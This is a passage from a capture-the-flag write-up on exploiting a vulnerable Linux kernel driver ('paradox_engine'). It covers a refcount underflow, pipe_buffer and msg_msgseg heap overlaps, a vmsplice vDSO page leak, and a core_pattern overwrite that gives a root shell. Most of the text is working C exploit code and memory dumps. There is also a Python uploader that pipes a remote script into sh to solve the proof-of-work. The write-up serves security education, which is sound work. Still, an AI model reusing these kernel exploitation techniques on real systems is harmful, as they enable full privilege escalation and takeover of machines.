0xffff888006494c30|+0x0c30|+390: 0xdead000000000122
0xffff888006494c38|+0x0c38|+391: 0xffff8880060d9900 <- parent timeline
0xffff888006494c40|+0x0c40|+392: 0x000000000000089d <- start of next temporal_event
0xffff888006494c48|+0x0c48|+393: 0x0000000000000000
0xffff888006494c50|+0x0c50|+394: 0x0000000000000000
0xffff888006494c58|+0x0c58|+395: 0x6c6c612d74736f70 'post-alloc object'
0xffff888006494c60|+0x0c60|+396: 0x63656a626f20636f 'oc object'
0xffff888006494c68|+0x0c68|+397: 0x0000000000000074
0xffff888006494c70|+0x0c70|+398: 0x0000000000000000
0xffff888006494c78|+0x0c78|+399: 0xd36fb47ca526cd22
0xffff888006494c80|+0x0c80|+400: 0x0000000000000000
0xffff888006494c88|+0x0c88|+401: 0x0000000000000000
0xffff888006494c90|+0x0c90|+402: 0x0000000000000000
0xffff888006494c98|+0x0c98|+403: 0xdead000000000100
0xffff888006494ca0|+0x0ca0|+404: 0xdead000000000122
0xffff888006494ca8|+0x0ca8|+405: 0xffff8880060d9980  ->  0x0000000000000000
...
```

For reference here's the `temporal_event` struct:

```c
struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};
```

Notice that the victim object is from `0xffff888006494bd0 - 0xffff888006494c3f` while the post-alloc object is from `0xffff888006494c40 - 0xffff888006494caf`

Furthermore, note that the victim's refcount is at `0xbfffffff` meaning it has underflowed, and its `causal_dependency` pointer is pointing to itself at `0xffff888006494bd0` .

:writing\_hand: Another important note is that all the objects are spaced `0x70 = 112` bytes apart. This is a highly abnormal size which was made possible by the use of the dedicated slab cache. In practice, it is very difficult for us to find exploitable kernel objects of this exact size. Ideally we would want the object to have the same size as other objects in the kmalloc- or kmalloc-cg- caches.&#x20;

:warning: If we tried to reclaim the page by spraying objects of a different size, and accidentally overwrite the `causal_dependency` pointer with an invalid non-null value, when the `paradox_engine_release` dereferences the pointer in the loop, the kernel would crash!

:brain: If we just overwrite `causal_dependency` with NULL, the loop simply terminates, and we don't use the infinite loop to kfree anything else. We basically "waste" the vulnerability.

:eyes: Ideally, we want to reclaim it with something that we can control so that we can control what we kfree next! If we overwrite the refcount to 1, and overwrite `causal_dependency` to something that can be kfreed, we will have a double allocation! But the problem with this is that we don't have any leaks :cry:, so we don't know what to overwrite it with either!

#### :bulb: The eureka moment&#x20;

I spent quite a few days spraying different objects to find out what could be a possible solution. As I was playing with `pipe_buffer`, I realised that very often the `page` storing the buffer's data would reclaim the victim page, and the data I write into the pipe would overwrite the bytes in the victim page. When we write into this page, we can overwrite the `causal_weight` refcount, followed by the `temporal_event *` .

This got me wondering: Is it possible that writing into this pipe could allow partial overwrites? What if instead of overwriting all 8 bytes of the `temporal_event *` I could just overwrite 1, or 2, or 3? :thinking:

It turns out, you can!&#x20;

Now let's think about what we can do with this in mind:

* Spray `pipe_buffer` , one of their pages will reclaim the victim page
* Since the refcount is always +0x8-bytes aligned, first write 0x10 bytes into each pipe. Then read those 0x10 bytes to see if the last 8 bytes had changed, for example from `\x00\x00\x00\x00\x00\x00\x00\x01` to `\x00\x00\x00\x00\xc0\x00\x00\x00` or to `\x00\x00\x00\x00\xbf\xff\xff\xff` . If they did change, then we know that the victim object is at offset +0x000 within the victim page, and we will also know which pipe holds the victim page.
  * Otherwise if the victim object is not at offset +0x000, we repeat the previous step, but this time writing 0x20 bytes and reading 0x20 bytes. We repeat this until we find the offset of the victim object within the victim page, and we know which pipe holds the victim page.

In doing these, we have found the pipe holding the victim page and the offset of the victim object within the victim page, and we also haven't touched the `temporal_event *` pointer. That's great!&#x20;

:question: Now the question is: What do we do with our partial overwrite primitive on the `temporal_event *`? To answer this question, I took a quick look at the pages in the page allocator using the `buddy-dump` command to see if there was anything useful. Note that at this point, my `temporal_event *` was `0xffff888006494bd0`.

I saw this:

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FqSIcX57LG7Umx7Q1OE7B%2Fimage.png?alt=media&#x26;token=c8db334e-b1f8-4a14-9176-2198d9505569" alt=""><figcaption></figcaption></figure>

<details>

<summary>What is "order"?</summary>

The buddy allocator maintains blocks of free pages where each block is a power of two number of pages. The exponent for the power of two sized block is referred to as the *order. If your order is 3 for example, that means that the block has* $$2^3$$ *pages.*

View this [page](https://www.kernel.org/doc/gorman/html/understand/understand009.html) for more info.

</details>

This is great for two reasons:

1. If I overwrite the least significant 3 bytes of `temporal_event *` to `\x60\x00\x00` I would be able to get this exact address
2. This pattern is consistent across reboots! Let's see another run:

Self-referring event at `0xffff88800654ea80`, order 9 unmovable page at `0xffff888006600000` :

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FTNHPBZCDyjviYBfzjWYA%2Fimage.png?alt=media&#x26;token=5e1bceb0-bd97-4838-893a-022f5de4179e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FR1q5peSuSIQqFVZ6H81v%2Fimage.png?alt=media&#x26;token=9c0e4c0d-f70b-4d4e-8719-32f9df11c4bc" alt=""><figcaption></figcaption></figure>

:thumbsup: So if we do something like this:

* Spray an object X to reclaim the order-9 page
* Partial overwrite `temporal_event *` to trigger kfree on its address
* Spray another object Y to reclaim the page again,

We could achieve an overlap between objects X and Y! Wonderful!

### Part 3. Spraying enlarged pipe\_buffers to claim the order-9 page

Now I was once again on the hunt for a new object. It had to be relatively large so that I could get it to use the order-9 page within a reasonable time, and also

:warning: Ideally at offset `+0x10` it should have NULL. Why? Look at `temporal_event` and the infinite loop again:

```c
struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};
static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
// paradox_engine_release snippet
while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}
```

In the first round of the loop, after we set refcount = 1 and do the partial overwrite, `next_in_chain` would be our page address. This then becomes `cause`.

In the second round of the loop, `next_in_chain` would be whatever is at `page+0x10` .

If `page+0x10` is not null, the third round of the loop would do `cause->causal_dependency` (which is actually `(*cause).causal_dependency` ) and dereference the value at `page+0x10` .

We also have a third requirement: Whatever is at offset +0x8 of the page overlaps with what the program thinks is the `temporal_event`'s refcount, so we should be able to set this to one if we actually want the reclaiming object to get freed using `event_put`.

:scroll: To summarise what we need of object X:

* Relatively large
* Value at +0x10 is (hopefully) null
* Value at +0x8 == 1

I was once again stuck at this point for several days. And then I saw the light. How? By again playing with `pipe_buffer`. Let's look closely at this bad boy, shall we?

:exclamation:Note that `pipe_buffer` structs don't exist in isolation; rather, they are allocated as a consecutive array of pipe buffers. In fact, there is another struct called `pipe_inode_info` which points to a **ring** of `pipe_buffers` in its `pipe_inode_info.buf` field.&#x20;

:green\_circle: `pipe_buffer` actually satisfies the "relatively large" requirement since we can enlarge the array via the function `fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n)` which changes the pipe ring size. (Here n should be a power of 2 according to [this](https://www.interruptlabs.co.uk/articles/pipe-buffer)).

:green\_circle: `pipe_buffer` also satisfies the third requirement since we can control the value of `pipe_buffer->offset` by reading from it.

```c
struct pipe_buffer {
  struct page * page; +0x0
  unsigned int offset; +0x8
  unsigned int len; +0xc
  const struct pipe_buf_operations * ops; +0x10
  unsigned int flags; +0x18
  unsigned long private; +0x20
};  // size of a pipe_buffer is 0x28
```

At first glance, it seems useless as it literally has a pointer at offset +0x10. If we simply create a `pipe_buffer` object in our page then trigger the vulnerability, we would get cooked as \*ops gets dereferenced and we get a crash somewhere down the line.

:angel: But here's our saving grace: When a `pipe_buffer` gets released, its `ops` field actually gets nulled! This is fantastic for us, since we can simply allocate then release the first `pipe_buffer` in the ring to null out whatever is at offset +0x10! We are still free to use the rest of the `pipe_buffers` in the page for exploitation.

There's a catch, however: a non-privileged user has a limit to the max `pipe_buffer` size they can allocate, and this can be checked in `/proc/sys/fs/pipe-max-size`:

```
~ $ cat /proc/sys/fs/pipe-max-size
1048576 = 0x1000 * 0x100
```

After spraying a bit (and praying), I found that spraying just 50 of these max-sized pipes was sufficient to consistently claim the order-9 page.

So for this step, basically just spray 50 of these max-sized pipes, and write and read 1 byte from each of them to trigger their release, which will NULL out the `ops` pointer. Simultaneously, writing and reading 1 byte from it causes `pipe_buffer->offset = 1` which allows the page to be freed when `event_put` is called on the page!

Here's the code for this part:&#x20;

```c
#define PIPE_BUF_SPRAY1 50

int pfds[PIPE_BUF_SPRAY1][2];
char* filler1 = malloc(0x1000);
memset(filler1, 'A', 0x1000);
int res;
// stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    res = pipe(pfds[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers\n" );
        return -1;
    }
    // enlarge
    // we can spray at most around 60 of these before we get cooked
    res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
    if (res < 0) {
        printf("fcntl %d failed!\n", i );
        return -1;
    }
    // write into bufs[0]
    res = write(pfds[i][1], filler1, 1);
    if (res < 0) {
        printf("write failed!\n" );
        return -1;
    }
}
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    // set the first pipe_buf's op field to NULL
    // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
    read(pfds[i][0], filler1, 1);
}
```

### Part 4. Trigger vuln

As discussed previously, overwrite the victim object, setting its refcount to 1 and overwriting the least significant 3 bytes to `\x60\x00\x00`. This *should* cause the page claimed in the previous step to now be freed!

To do so, free the victim pipe whose id we now know, and spray `pipe_buffer` again.

The issue here was that freeing this victim pipe sometimes caused the page to go into CPU 1's partial list, which I did not have control of. This could have been due to some balancing of cpu partial lists. To deal with this issue, I create some dummy `pipe_buffers` by calling `pipe` then writing into each pipe, and closed them before closing the victim pipe.

:exclamation: This reclamation is only successful slightly less than 50% of the time, and it's where my exploit loses the bulk of its consistency.

Code:

```c
// need to spray enough to push the victim pipe into free_area instead of cpu1 ?
int dummy_pipes[DUMMY_PIPES][2];
for (int i = 0; i < DUMMY_PIPES; i++) {
    int res = pipe(dummy_pipes[i]);
    if (res < 0) {
        printf("Failed to create pipe %d\n", i);
        break;
    }
}
for (int i = 0; i < DUMMY_PIPES; i++) {
    res = write(dummy_pipes[i][1], "a", 1);
    if (res < 0) {
        printf("Failed to write to pipe %d\n", i);
        break;
    }
    close(dummy_pipes[i][1]);
    close(dummy_pipes[i][0]);
}
close(pipe_fds[changed_pipe][1]);
close(pipe_fds[changed_pipe][0]);
usleep(1000);
// getchar();
char* buf = malloc(cursize + 3);
memset(buf, '\x00', cursize + 3);
buf[cursize - 0x8] = '\x01'; // refcount
// buf[cursize + 2] = '\xa0';
buf[cursize + 2] = '\x60';
// spray more pipe_buffer for the partial overwrite
int stage_2_pipes[PIPE_BUF_SPRAY2][2];
for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
    // printf("i: %d\n", i);
    int res = pipe(stage_2_pipes[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers %d\n", i);
        break;
    } 
    ret = write(stage_2_pipes[i][1], buf, cursize + 3);
    if (ret < 0) {
        printf("[x] Write!\n");
        break;
    }
}
```

### Part 5. Overlapping objects X and Y

Now we need to choose an object Y which will overlap with our array of `pipe_buffers` . Note that as the vuln triggers a kfree in CPU 1 (as our infinite loop occurred in CPU 1), this part has to be done in CPU 1. I achieved this by creating a thread and pinning it to CPU 1.&#x20;

Note that our object here should claim a page of order $$\leq$$ 2 because the re-released page is of order 2:

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FZoLl9wMA264VUEdcvOMp%2Fimage.png?alt=media&#x26;token=529a6ddf-a6af-48e5-b926-12c7881e7516" alt=""><figcaption></figcaption></figure>

The ideal candidate here, of course, would be `msg_msgseg` since we pretty much get arbitrary read + write over the entire struct, and we can modify its size by controlling the size of the data we send using `msgsnd`. As we can freely modify its size, we can also control the order of the page it reclaims.

<details>

<summary>Background on System V IPC</summary>

Function Signatures:

```c
int msgget(key_t key, int msgflg);
ssize_t msgrcv(size_t msgsz;
                      int msqid, void msgp[msgsz], size_t msgsz, long msgtyp,
                      int msgflg);
int msgsnd(size_t msgsz;
                      int msqid, const void msgp[msgsz], size_t msgsz,
                      int msgflg);
```

Sending messages via System V IPC first needs you to create a message queue as follows:

```c
int qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
```

Then using the queue id, you can send a message as such:

```c
struct msgbuf {
            long mtype;
            char mtext[0x1000-0x30-0x8+0x400];
};
msgbuf* msg = malloc(sizeof(msgbuf));
msg->mtype = 6;
int ret = msgsnd(qid, msg, sizeof(msg->mtext), 0);
if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
}
```

and receive them as such:

```c
msgrcv(msqid, leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
```

Note: In `msgrcv`, you can specify `IPC_NOWAIT | MSG_COPY` if you don't want the underlying `msg_msg` or `msg_msgseg` structs to be freed when the message is received

Note: Specifying the message's `mtype` when sending and receiving messages allows you to specify which message you want. If your `msgrcv` mtype is 0, you just get the first message in the queue.

</details>

<details>

<summary>What is msg_msgseg?</summary>

First, understand that the size of a msg\_msg struct is 0x30, and the rest of the struct is the transmitted data. If the data sent exceeds (0x1000 - 0x30) = 0xfd0 bytes, the remaining data is transmitted in a msg\_msgseg struct. msg\_msgseg struct has an 8-byte pointer, and user data comes after.

</details>

```c
undefined struct msg_msg {
	struct list_head m_list; +0x0
	long m_type; +0x10
	size_t m_ts;  +0x18
	struct msg_msgseg *next; +0x20
	void *security; +0x28
	/* the actual message follows immediately */
};

msg_msgseg {
	msg_msgseg* next;
 	/* content afterwards */
}
```

I went ahead with a 0x400-sized `msg_msgseg` spray, and my `msg_msgseg` goes into `kmalloc-cg-1k`. When we do `slub-dump kmalloc-cg-1k` in gef, we can clearly see that the page order is 2, because num pages: 4. Therefore it is a good size to choose to maximise the chance of `msg_msgseg` reclaiming the page!

<figure><img src="https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2Fmq4rlTLE8SX8bH50caEg%2Fimage.png?alt=media&#x26;token=8f9d64ea-8a0f-4f28-9770-3595109a71ea" alt="" width="375"><figcaption></figcaption></figure>

Here's my code for this segment:

```c
#define NUM_MSGMSG 250
int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg() {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
        }
    }
}
int main(){ 
...
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
...
}

```

### Part 6. vmsplice syscall

Now that we have overlapping `msg_msgseg` and `pipe_buffer` structs, we need to think of how to get LPE.&#x20;

:x: One option was getting a text leak from `pipe_buffer->ops` , then replacing it with a stack pivot gadget and doing kROP. But this won't work since SMAP and SMEP are enabled.

After some research, I came across [this exploit](https://github.com/google/security-research/blob/c6bbc1e706152250c3e412d2c7b9257788665fa1/pocs/linux/kernelctf/CVE-2024-26808_cos/docs/exploit.md?plain=1#L401) which had a similar `msg_msgseg` and `pipe_buffer` overlap.&#x20;

<details>

<summary>What is vdso?</summary>

Wikipedia: vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of [kernel space](https://en.wikipedia.org/wiki/Kernel_space) routines to [user space](https://en.wikipedia.org/wiki/User_space) applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a [mode switch](https://en.wikipedia.org/wiki/Mode_switch_\(computing\)) from [user mode](https://en.wikipedia.org/wiki/User_mode) to [kernel mode](https://en.wikipedia.org/wiki/Kernel_mode) that is inherent when calling these same kernel space routines by means of the [system call](https://en.wikipedia.org/wiki/System_call) interface.

While vDSO is provided by the kernel, it resides within the user-space portion of a process's virtual address space.

</details>

By doing something like this:

```c
#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})
// get vDSO addr
// https://man7.org/linux/man-pages/man3/getauxval.3.html
size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
struct iovec iov = {vvar, 1};
// vmsplice vDSO to the pipe, it will spill struct page of kernel text to the pipe
SYSCHK(vmsplice(mypipe[1], &iov, 1, 0));
```

We cause `pipe_buffer->page` to refer to the page struct corresponding to vDSO. That is, a page responsible for kernel text.

<details>

<summary><span data-gb-custom-inline data-tag="emoji" data-code="1f914">🤔</span> Why is this helpful? </summary>

With a leaked page\* pointer from the pipe\_buffer, we can change it to be the page responsible for any region of kernel text! We'll see why this is useful later.

</details>

### Part 7. Leaking page\* of kernel text

To recap what we've done, we:

1. Sprayed `msg_msgseg` into the first 0x400 bytes of the page to reclaim the order 2 page
2. Overwrote some of  the `msg_msgseg` (to be specific the second chunk of 0x28 bytes) using the spliced pipe\_buffer, whose `page *` is responsible for vDSO

Now if we read from `msg_msgseg` we can get the `page *` leak! (Note: the `ops *` leak isn't really necessary)

```c
int victim_msqid = -1;

struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
leakmsg->mtype = 6;
memset(leakmsg, 0, sizeof(struct leakmsgbuf));
char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
struct pipe_buffer *p;
for (int i = 0; i < NUM_MSGMSG; i++) {
    // read msg without freeing memory
    ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
    if (ret < 0) {
        perror("msgrcv"); 
        continue;
    }
    if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
        msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
        victim_msqid = ms_qids[i];
        printf("[+] Victim found! msqid: %d\n", victim_msqid);
        // print victim data
        for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
            printf("%02x ", leakmsg->mtext[i]);
        }
        printf("\n");
        p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
        break;
    }
}
/*
no kaslr leaks : 
- page leak: 0xffffea00000cf400
- pipe_buf_ops leak: 0xffffffff82c6fe80

kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

    struct pipe_buffer {
        void *page;
        unsigned int offset, len;
        void *ops;
        unsigned int flags;
        unsigned long private;
    };
*/
if (victim_msqid == -1) {
    printf("Victim msqid not found!\n");
    return -1;
}
void *page_leak;
memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
void *pipe_buf_ops_leak;
memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
printf("page leak: %p\n", page_leak);
printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);
```

### Part 8 + 9. Overwriting the second pipe

Now what can we do with the `page *` leak? Well, there happens to be a region of kernel text called the `core_pattern`, which basically tells the kernel what to do when there's a crash.&#x20;

In the linux kernel documentation [/usr/src/linux/Documentation/sysctl/kernel.txt](https://www.kernel.org/doc/Documentation/sysctl/kernel.txt).

> \[/proc/sys/kernel/]core\_pattern is used to specify a core dumpfile pattern name.
>
> * If the first character of the pattern is a '|', the kernel will treat the rest of the pattern as a command to run. The core dump will be written to the standard input of that program instead of to a file.

In other words, overwriting the core\_pattern with something starting with '|' results in whatever comes after as a command which will be run in kernel mode!

But the question now is: Sure, we know the address of the `page *` pointing to vDSO, but how do we know the address of the `page *` responsible for `core_pattern`? It turns out that the offset between them is constant. By calculating the offset between the `vDSO` and `core_pattern` virtual addresses we can also calculate the offset between their respective `page *` structs!

In my case, I found:

```c
// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60
```

The difference between the address of the pages of vdso\_image\_64.data and core\_pattern is 0x438000. For every 0x1000 byte page, there is a 64 byte struct page\* stored in vmemmap, so to calculate the difference between struct page\* addresses, you have to do: 0x438000 / 4096 \* 64 which equals to 0x863000 >> 6

Looking at the pre-overwritten `pipe_buffer`:

```c
struct pipe_buffer {
  struct page * page; +0x0
  unsigned int offset; +0x8
  unsigned int len; +0xc
  const struct pipe_buf_operations * ops; +0x10
  unsigned int flags; +0x18
  unsigned long private; +0x20
};  
  
  0xffff888006600000|+0x0000|+000: 0x0000000000000000 <- start of bufs[0] pipe_buffer
  0xffff888006600008|+0x0008|+001: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600010|+0x0010|+002: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600018|+0x0018|+003: 0x6161616161616161 'aaaaaaaaaaaaaaaa'
  0xffff888006600020|+0x0020|+004: 0x6161616161616161 'aaaaaaaa'
  0xffff888006600028|+0x0028|+005: 0xffffea00000cf400  ->  0x008c000000002204 <- start of bufs[1] pipe_buffer and the page leak!
  0xffff888006600030|+0x0030|+006: 0x0000000100000000
  0xffff888006600038|+0x0038|+007: 0xffffffff82c6fe80 <user_page_pipe_buf_ops>  ->  0x0000000000000000
  0xffff888006600040|+0x0040|+008: 0x0000000000000000
  0xffff888006600048|+0x0048|+009: 0x0000000000000000
  0xffff888006600050|+0x0050|+010: 0x6161616161616161
```

the `len = 1` already. By leaving the `len` untouched and setting `pipe_buffer->offset = 0xa60 - 1` we can change the entire content of `core_pattern`! We also need to add the `PIPE_BUF_FLAG_CAN_MERGE` flag to `pipe_buffer->flags` to allow every pipe write to also write to the physical page.

Here's the code for this part:

```c
// modify struct page that will represent of `core_pattern`'s page
// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60
// the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000
// every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
// so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6
// (right shift by 12 bits and left shift by 6 bits)
p->page += (0x438000 >> 6);
// Since p->len == 1, we need to subtract one on p->offset
p->offset = 0xa60 - 1;
p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
leakmsg->mtype = 7;
// overwrite the pipe_buffer with msg_msgseg (with our own modified pipe_buffer content)
int payload_msqids[0x100];
for (int i = 0; i < 0x100; i++) {
    payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}
for (int i = 0; i < 0x100; i++) {
    ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
    if (ret < 0) {
        printf("[x] msgsnd %d!\n", i);
        return -1;
    }
}
```

### Part 10. Setting up the command + executing it for root shell

We still need to decide what to write into the `core_pattern` which will give us LPE when a crash is triggered. I used the same method as [this exploit](https://github.com/google/security-research/blob/c6bbc1e706152250c3e412d2c7b9257788665fa1/pocs/linux/kernelctf/CVE-2024-26808_cos/docs/exploit.md?plain=1#L401), which was to overwrite it with `|/proc/%P/fd/666 %P\n`. Doing so causes the kernel to execute whatever process is on the crashing process' FD 666, passing the PID as an argument.

Then consider the following `main`:&#x20;

```c
int cfd[2];
char* dummybuf = "abcd";

void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int main(int argc, char **argv) {
        // if it called from triggerred crash from core pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
        // this code is "activated" when core_pattern has been overwritten and triggers a crash
        setvbuf(stdout, 0, 2, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}
        // ...
        // end of main
        for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        	dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    	}
    	printf("[+] Stage 7 done!\n");
    	// show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    	// getchar();
    
    	write(cfd[1], dummybuf, 1);
    	while (1) {
        	sleep(100);
    	}

    	return 0;
}
```

The child process:

* Creates an in-memory file and copies the program's ELF image into it
* Moves it to fd 666, so it is reachable at `/proc/CHILD-PID/fd/666`
* Waits for the parent's signal that the exploit is finished by doing `read(cfd[0], dummybuf, 1)`

When `write(cfd[1], dummybuf, 1)` is executed, the parent signals to the child it is done.

The child then triggers a crash by dereferencing NULL, causing the code which we wrote into `core_pattern` to be executed. This causes the executable at `/proc/CHILD-PID/fd/666` to be executed with an argument, giving us a root shell and reading the flag.

### Compiling and sending the exploit to remote

According to ptr-yudai's [blog post](https://pawnyable.cafe/linux-kernel/introduction/compile-and-transfer.html), it usually works fine if you use `musl-gcc` to compile your exploit code (with the effect of making the binary much smaller), and sending it to remote as base64. However, for some reason my exploit wasn't working once I used `musl-gcc` to compile it. The third LSB to overwrite in the partial-overwrite stage had changed. The exploit worked once I changed that.

I also used the following `uploader.py` (generated by ChatGPT) to automate the PoW solving, sending of base64 and decoding it to the binary:

{% code lineNumbers="true" %}

```python
#!/usr/bin/env python3
from pwn import *
import base64
import subprocess
import re

def solve_pow(pow_command):
    """Solve the proof of work challenge"""
    log.info(f"Solving PoW: {pow_command}")
    try:
        result = subprocess.run(pow_command, shell=True, capture_output=True, text=True, timeout=30)
        if result.returncode == 0:
            solution = result.stdout.strip()
            log.success(f"PoW solution: {solution}")
            return solution
        else:
            log.error(f"PoW failed: {result.stderr}")
            return None
    except Exception as e:
        log.error(f"PoW error: {e}")
        return None

def run(io, cmd):
    io.sendlineafter(b"$ ", cmd.encode())
    io.recvline()

def main():
    # Configuration
    USE_REMOTE = True  # Set to True for remote
    HOST = "159.223.33.156"
    PORT = 9102
    
    # Read exploit binary
    with open("./test", "rb") as f:
        payload = base64.b64encode(f.read()).decode('ascii')
    
    # Connect
    if USE_REMOTE:
        io = remote(HOST, PORT)
        
        # Handle PoW if present
        try:
            initial = io.recvuntil(b"solution:", timeout=5).decode()
            pow_match = re.search(r'curl -sSfL https://pwn\.red/pow \| sh -s ([^\s]+)', initial)
            if pow_match:
                challenge = pow_match.group(1)
                pow_command = f"curl -sSfL https://pwn.red/pow | sh -s {challenge}"
                solution = solve_pow(pow_command)
                if solution:
                    io.sendline(solution.encode())
                else:
                    log.error("Failed to solve PoW")
                    return
        except EOFError:
            pass  # No PoW challenge
    else:
        io = process("./run.sh")
    
    # Upload exploit
    run(io, 'cd /tmp')
    
    log.info("Uploading exploit...")
    for i in range(0, len(payload), 512):
